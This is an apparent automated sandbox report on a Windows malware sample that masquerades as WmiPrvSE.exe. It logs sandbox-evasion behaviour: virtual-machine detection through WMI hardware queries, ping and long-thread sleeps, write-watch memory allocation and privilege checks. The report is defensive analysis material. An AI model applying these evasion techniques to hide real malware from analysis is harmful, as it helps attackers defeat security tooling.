Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Memory allocated: 1370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Memory allocated: 1AF70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1AE00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1230000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1B040000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: B80000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1A5E0000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: E10000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1A9F0000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1880000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1B220000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 2C60000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1AD00000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 17C0000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1B410000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: E80000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1AA40000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1170000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1ABE0000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: E50000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1AC40000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 19E0000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\WmiPrvSE.exe	Memory allocated: 1B410000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477

Found evasive API chain checking for process token information

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe TID: 7692	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 7968	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 7904	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 7236	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 4600	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 7648	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 7672	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 7988	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 1196	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 7200	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 5436	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 6952	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 4432	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 7620	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 3228	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 7784	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 2792	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 3488	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 2936	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 2920	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 916	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 3848	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\WmiPrvSE.exe TID: 5852	Thread sleep time: -922337203685477s >= -30000s

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B8BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00B8BA94
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B9D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00B9D420
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009EBA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	3_2_009EBA94
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009FD420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	3_2_009FD420

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Code function: 0_2_00B9F82F VirtualQuery,GetSystemInfo,

0_2_00B9F82F

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: w32tm.exe, 0000002E.00000002.2487819773.000001B9C87D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
Source: WmiPrvSE.exe, 0000003F.00000002.2838141608.000000001C0B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD00#4&\|
Source: WmiPrvSE.exe, 0000000F.00000002.1919315964.000000001BC10000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}h
Source: WmiPrvSE.exe, 0000002F.00000002.2556933047.000000001B8E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
